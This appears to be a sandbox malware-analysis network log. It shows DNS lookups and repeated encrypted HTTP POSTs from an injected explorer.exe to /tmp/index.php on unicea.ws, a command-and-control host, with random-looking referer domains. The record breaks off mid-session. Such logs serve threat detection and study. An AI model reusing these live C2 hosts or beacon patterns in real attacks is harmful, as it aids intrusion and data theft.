Oct 19, 2024 06:44:17.761531115 CEST	1.1.1.1	192.168.2.4	0xe53	Name error (3)	nwgrus.ru	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:44:17.780821085 CEST	1.1.1.1	192.168.2.4	0x1a0	Name error (3)	tech-servers.in.net	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:44:23.920578003 CEST	1.1.1.1	192.168.2.4	0xd03f	Name error (3)	nwgrus.ru	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:44:23.941919088 CEST	1.1.1.1	192.168.2.4	0xa5e	Name error (3)	tech-servers.in.net	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:44:29.496779919 CEST	1.1.1.1	192.168.2.4	0x28f4	Name error (3)	nwgrus.ru	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:44:29.511501074 CEST	1.1.1.1	192.168.2.4	0x2c92	Name error (3)	tech-servers.in.net	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:44:35.670763969 CEST	1.1.1.1	192.168.2.4	0x5a75	Name error (3)	nwgrus.ru	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:44:35.692931890 CEST	1.1.1.1	192.168.2.4	0x43fe	Name error (3)	tech-servers.in.net	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:44:41.894262075 CEST	1.1.1.1	192.168.2.4	0x4604	Name error (3)	nwgrus.ru	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:44:41.916258097 CEST	1.1.1.1	192.168.2.4	0x84e3	Name error (3)	tech-servers.in.net	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:44:47.568840027 CEST	1.1.1.1	192.168.2.4	0xab35	Name error (3)	nwgrus.ru	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:44:47.588046074 CEST	1.1.1.1	192.168.2.4	0x9c3a	Name error (3)	tech-servers.in.net	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:44:53.407582998 CEST	1.1.1.1	192.168.2.4	0x84e9	Name error (3)	nwgrus.ru	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:44:53.424381018 CEST	1.1.1.1	192.168.2.4	0x1446	Name error (3)	tech-servers.in.net	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:44:58.652081966 CEST	1.1.1.1	192.168.2.4	0x7985	Name error (3)	nwgrus.ru	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:44:58.670176983 CEST	1.1.1.1	192.168.2.4	0x277d	Name error (3)	tech-servers.in.net	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:44:58.967871904 CEST	1.1.1.1	192.168.2.4	0x4733	No error (0)	unicea.ws		116.58.10.60	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:44:58.967871904 CEST	1.1.1.1	192.168.2.4	0x4733	No error (0)	unicea.ws		190.218.17.143	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:44:58.967871904 CEST	1.1.1.1	192.168.2.4	0x4733	No error (0)	unicea.ws		190.220.21.28	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:44:58.967871904 CEST	1.1.1.1	192.168.2.4	0x4733	No error (0)	unicea.ws		196.189.156.245	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:44:58.967871904 CEST	1.1.1.1	192.168.2.4	0x4733	No error (0)	unicea.ws		2.185.214.11	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:44:58.967871904 CEST	1.1.1.1	192.168.2.4	0x4733	No error (0)	unicea.ws		187.199.203.72	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:44:58.967871904 CEST	1.1.1.1	192.168.2.4	0x4733	No error (0)	unicea.ws		201.110.253.191	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:44:58.967871904 CEST	1.1.1.1	192.168.2.4	0x4733	No error (0)	unicea.ws		123.213.233.131	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:44:58.967871904 CEST	1.1.1.1	192.168.2.4	0x4733	No error (0)	unicea.ws		46.100.50.5	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:44:58.967871904 CEST	1.1.1.1	192.168.2.4	0x4733	No error (0)	unicea.ws		105.197.97.247	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:45:05.594314098 CEST	1.1.1.1	192.168.2.4	0xd741	Name error (3)	nwgrus.ru	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:45:05.609821081 CEST	1.1.1.1	192.168.2.4	0x40e3	Name error (3)	tech-servers.in.net	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:45:11.752604008 CEST	1.1.1.1	192.168.2.4	0x84d7	Name error (3)	nwgrus.ru	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:45:11.765506029 CEST	1.1.1.1	192.168.2.4	0x457d	Name error (3)	tech-servers.in.net	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:45:18.366010904 CEST	1.1.1.1	192.168.2.4	0x24f9	Name error (3)	nwgrus.ru	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:45:18.409480095 CEST	1.1.1.1	192.168.2.4	0x3e84	Name error (3)	tech-servers.in.net	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:45:24.701432943 CEST	1.1.1.1	192.168.2.4	0xd2c5	Name error (3)	nwgrus.ru	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:45:24.723958015 CEST	1.1.1.1	192.168.2.4	0x34ae	Name error (3)	tech-servers.in.net	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:45:31.514403105 CEST	1.1.1.1	192.168.2.4	0x9ad2	Name error (3)	nwgrus.ru	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:45:31.534745932 CEST	1.1.1.1	192.168.2.4	0x1344	Name error (3)	tech-servers.in.net	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:45:37.840265036 CEST	1.1.1.1	192.168.2.4	0xa13	Name error (3)	nwgrus.ru	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:45:37.855453968 CEST	1.1.1.1	192.168.2.4	0xde4a	Name error (3)	tech-servers.in.net	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:45:43.967185974 CEST	1.1.1.1	192.168.2.4	0xc819	Name error (3)	nwgrus.ru	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:45:43.967202902 CEST	1.1.1.1	192.168.2.4	0xc819	Name error (3)	nwgrus.ru	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:45:43.985213995 CEST	1.1.1.1	192.168.2.4	0xc5be	Name error (3)	tech-servers.in.net	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:45:50.083595991 CEST	1.1.1.1	192.168.2.4	0xe383	Name error (3)	nwgrus.ru	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:45:50.850619078 CEST	1.1.1.1	192.168.2.4	0x2892	Name error (3)	tech-servers.in.net	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:45:57.396687984 CEST	1.1.1.1	192.168.2.4	0xfde9	Name error (3)	nwgrus.ru	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:45:57.396701097 CEST	1.1.1.1	192.168.2.4	0xfde9	Name error (3)	nwgrus.ru	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:45:57.421417952 CEST	1.1.1.1	192.168.2.4	0x5711	Name error (3)	tech-servers.in.net	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:46:05.385740995 CEST	1.1.1.1	192.168.2.4	0x78b4	Name error (3)	nwgrus.ru	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:46:05.401643991 CEST	1.1.1.1	192.168.2.4	0xac92	Name error (3)	tech-servers.in.net	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

phdqgddkvvudcrt.org

unicea.ws

fnmiroofcti.org

irneakwnfjo.net

tbpxxwuuktsgi.com

lcmemwnyvfua.net

supcacejjlal.net

gfxdwdqexxrn.org

pcavojwgokxdrh.com

rjqbihcnrwkn.org

dchxksvmirnse.com

hhfxvhfrxxonmmed.com

qvjyoylilnetkk.org

qpewsiogiap.org

ogxfbekgdosi.com

tvtkflumbvrf.com

mlktwknksogej.net

rnhsdeqcuhv.net

potyjbnxqkwihrq.com

twhmygynknwaynw.org

vqovnajgvrg.net

iqalmqarlgoleo.com

manlfvrucld.net

bmtcjbsxoypbehg.org

hyntfrjgoodahxw.org

pfdeyqiftydbxp.net

oxhmmntuaoqjqw.com

jhatysyfpdjacrth.com

ekrrlfpmfkagxhov.net

mwurfcocxsehx.org

qjdqfxwyvfh.net

gwjmvpjprpa.net

hsokfaschfagb.org

yfwhugqkygknlega.net

clwlueiouwtdjlp.org

komfkwumjafaljeh.net

gkcfyfujfvjeukc.net

dsuiipbvrtqiui.net

cottwgkexhqi.com

tyhclxkbrciiuit.net

fdwyluiudrfobcvl.org

shybhbwsshpkm.net

ejvcjodbems.net

oilnmucjwyntrxl.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	123.213.233.131	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 19, 2024 06:42:25.014040947 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://phdqgddkvvudcrt.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 314 Host: unicea.ws
Oct 19, 2024 06:42:25.014059067 CEST	314	OUT	Data Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 76 4b c9 fc Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vuvK UqX9K4~;p*h]n7"Y;E(%`#y@'qO])Z,o]3%7djU~p3peZd

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49926	123.213.233.131	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 19, 2024 06:43:31.092417955 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fnmiroofcti.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 211 Host: unicea.ws
Oct 19, 2024 06:43:31.092418909 CEST	211	OUT	Data Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 43 07 d6 98 Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vuC`Ty_Co}9>.~{kbriRYX1_&R;Tq]).}3k0FV65-BAlr

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49933	123.213.233.131	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 19, 2024 06:43:32.647191048 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://irneakwnfjo.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 119 Host: unicea.ws
Oct 19, 2024 06:43:32.647219896 CEST	119	OUT	Data Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 26 0b ed f9 Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vu&;j_*B}IHHbV

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49938	123.213.233.131	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 19, 2024 06:43:33.790662050 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tbpxxwuuktsgi.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 128 Host: unicea.ws
Oct 19, 2024 06:43:33.790689945 CEST	128	OUT	Data Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 79 0b a1 ed Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vuy.c6seFngi,9Fg

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49945	123.213.233.131	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 19, 2024 06:43:34.983871937 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://lcmemwnyvfua.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 279 Host: unicea.ws
Oct 19, 2024 06:43:34.983918905 CEST	279	OUT	Data Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3e 07 f8 e8 Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vu>DFylc]i`!bD0uP&CK Buq`Fz+`0'3\1U*XsOxFL\IJz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49951	123.213.233.131	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 19, 2024 06:43:36.208466053 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://supcacejjlal.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 256 Host: unicea.ws
Oct 19, 2024 06:43:36.208488941 CEST	256	OUT	Data Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 6f 1e b3 ee Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vuommwbRD8to5H'=\ ;)B/@FMHrwdP{SiAZ,S@y^7]$4OgOV1a8`?J3$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49957	123.213.233.131	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 19, 2024 06:43:37.387864113 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gfxdwdqexxrn.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 264 Host: unicea.ws
Oct 19, 2024 06:43:37.387881994 CEST	264	OUT	Data Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 48 40 b9 f7 Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vuH@prPN5E#7:MblU<dAMqY86SO#5al\|GEMX}D;(P7\.\|Qm[)$_/$I`

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49968	123.213.233.131	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 19, 2024 06:43:39.080082893 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pcavojwgokxdrh.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 127 Host: unicea.ws
Oct 19, 2024 06:43:39.080111027 CEST	127	OUT	Data Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 67 17 b7 a3 Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vug(\zx"TSip;bD0QY

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49978	123.213.233.131	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 19, 2024 06:43:40.273551941 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rjqbihcnrwkn.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 323 Host: unicea.ws
Oct 19, 2024 06:43:40.273581982 CEST	323	OUT	Data Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 42 21 c1 9d Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vuB!ycqL:## s[`I_;"ZLU[$O!_2\|%R=Q~>`?a(eU4>WpaMH

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49985	123.213.233.131	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 19, 2024 06:43:41.628854036 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dchxksvmirnse.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 270 Host: unicea.ws
Oct 19, 2024 06:43:41.628884077 CEST	270	OUT	Data Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7c 0a b6 91 Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vu\|1}]tY~SR)v"\|^1n^GKVlU "+`U>B0RvRH<E!KjdHLz02wmlE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49996	123.213.233.131	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 19, 2024 06:43:43.321141005 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://hhfxvhfrxxonmmed.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 299 Host: unicea.ws
Oct 19, 2024 06:43:43.321171045 CEST	299	OUT	Data Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 52 54 a1 8e Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vuRT@PZ`goM"74$UxCY\ _VM;/dA\$ j=otSIQS5[Mic%dwd,p

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	50005	123.213.233.131	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 19, 2024 06:43:44.691551924 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qvjyoylilnetkk.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 173 Host: unicea.ws
Oct 19, 2024 06:43:44.691591978 CEST	173	OUT	Data Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7f 42 d1 8d Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vuB[ZzQ~:=AI2C>P$f?2,w~u(K}3tyM/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	50012	123.213.233.131	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 19, 2024 06:43:45.857701063 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qpewsiogiap.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 188 Host: unicea.ws
Oct 19, 2024 06:43:45.857701063 CEST	188	OUT	Data Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4f 23 c5 ae Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vuO#i)isTHPUb.^jZtqb\C/^~INDtRGp\E[$Ruy

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	50015	123.213.233.131	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 19, 2024 06:43:47.257234097 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ogxfbekgdosi.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 369 Host: unicea.ws
Oct 19, 2024 06:43:47.257234097 CEST	369	OUT	Data Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 63 22 ac 90 Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vuc"V\Z\|`qC.6o)b`hPo2**K;Ey'3oJ)Im\Vuo02(<3HKG}%-]>9"k

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	50016	123.213.233.131	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 19, 2024 06:43:48.433176041 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tvtkflumbvrf.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 350 Host: unicea.ws
Oct 19, 2024 06:43:48.433207989 CEST	350	OUT	Data Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3f 4b d3 91 Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vu?K{@Qy`nXU'h#kYwo8SSR,^;~/Meml=eHh1NK'%sEDu9J?>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	50017	123.213.233.131	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 19, 2024 06:43:49.727139950 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mlktwknksogej.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 270 Host: unicea.ws
Oct 19, 2024 06:43:49.727173090 CEST	270	OUT	Data Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 31 52 ae bf Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vu1RsNcDu%E9*fUi cgUR$'D]O>H_Jz^2"w4m9_!szWWdqF\|5=]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	50018	123.213.233.131	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 19, 2024 06:43:51.037252903 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rnhsdeqcuhv.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 299 Host: unicea.ws
Oct 19, 2024 06:43:51.037280083 CEST	299	OUT	Data Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 74 41 bd a3 Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vutAO0Px_"v+m{?hU37E&_7PCG(*"+%PLKGnhn"Q^W\|CLT[icbPI/~

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	50019	123.213.233.131	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
